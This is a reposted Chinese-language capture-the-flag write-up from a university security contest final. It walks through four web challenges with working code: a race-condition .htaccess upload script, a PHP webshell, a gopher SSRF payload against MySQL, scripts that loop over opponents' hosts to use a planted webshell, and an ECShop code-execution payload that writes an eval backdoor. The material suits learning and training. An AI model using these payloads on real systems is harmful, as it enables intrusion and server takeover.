第三屆江西高校網安大賽線下決賽web解題思路-有解無憂

本次大賽,恭喜本戰隊bleem,取得優異成績,加油!
在這里插入圖片描述

Jeopardy

上午解題模式中,給了兩個web

web1:

這題上傳一個圖片．用burp修改php型別上傳之后會得到提示，＇比比誰速度快＇,嘗試上傳.htaccess,也是可以猜想到通過競爭條件一直上傳.htaccess,這樣再上傳一個圖片木馬,即可獲取shell

上傳.htaccess腳本

import requests
import time



while True:
    files = {'file': ('.htaccess', open('.htaccess', 'rb'), 'image/jpeg')}
    r = requests.post('http://127.0.0.1/upload',files=files)
    time.sleep(0.5)


"""
.htaccess:

<FilesMatch "jpg">
SetHandler application/x-httpd-php
</FilesMatch>
"""

再上傳一個jpg的圖片一句話木馬就ok了
shell.jpg

<?php system('cat /flag.txt');?>

web2:

這題可以通過file協議讀取/etc/passwd,但是讀取file:///flag.txt發現并不存在,讀取index.php被禁止,通過F12查看網頁原始碼,發現flag存放在mysql里面,首先想到通過gopher協議讀取flag,比賽中沒能構造好payload,不管這個方法對不對,也當是學習啦

訪問mysql執行查詢陳述句

在這里插入圖片描述

wireshark抓包,追蹤流,過濾出紅色的發送資料

在這里插入圖片描述
把資料轉換一下
gopher://127.0.0.1:3306/_%26%00%00%01%85%a6%03%00%00%00%00%01%08%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%21%00%00%00%03%73%65%6c%65%63%74%20%40%40%76%65%72%73%69%6f%6e%5f%63%6f%6d%6d%65%6e%74%20%6c%69%6d%69%74%20%31%28%00%00%00%03%73%65%6c%65%63%74%20%69%6e%66%6f%20%66%72%6f%6d%20%64%76%77%61%2e%63%74%68%61%63%6b%20%77%68%65%72%65%20%69%64%3d%32

CRLF的問題,curl測驗結尾加上%0d0a

在這里插入圖片描述

AWD模式

下午的AWD模式也是只有兩個web

web1:
web1在/var/www/html/目錄下ls -a可以發現一個隱藏為.shell.php,過濾了flag可以通過cat /fla*繞過
腳本:

import requests

ip1='http://172.20.'
ip2='.101'
ip=[]

for i in range(101,113,1):
    ip.append(ip1+str(i)+ip2)

data={'cmd':'system("cat /fla*");'}

for i in ip:
    try:
        r=requests.post(i+'/.shell.php',data=data,timeout=0.5)
        print i
        print r.text
    except:
        pass

web2:
ECSHOP的代碼執行漏洞
先執行curl命令的payload
附上腳本:

import requests
import os

'''
curl "http://172.20.102.102/user.php" -d "action=login&okami=phpinfo();exit;" -H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'



curl "http://172.20.102.102/user.php" -d "action=login&okami=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbChbb2thbWldKTsnKQoOw));exit;" \-H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'
'''


ip1='http://172.20.'
ip2='.102'
ip=[]

for i in range(101,113,1):
    ip.append(ip1+str(i)+ip2)

for i in ip:
    try:
        r=requests.post(i+'/okami.php?okami=system("cat /flag.txt");',timeout=0.5)
        print i
        print r.text
    except:
        pass

轉載請註明出處，本文鏈接：https://www.uj5u.com/qita/76219.html

標籤：其他

上一篇：Java 面試筆記之常考知識點 ThreadLocal 剖析

下一篇：單例模式是否真的執行緒安全之----列舉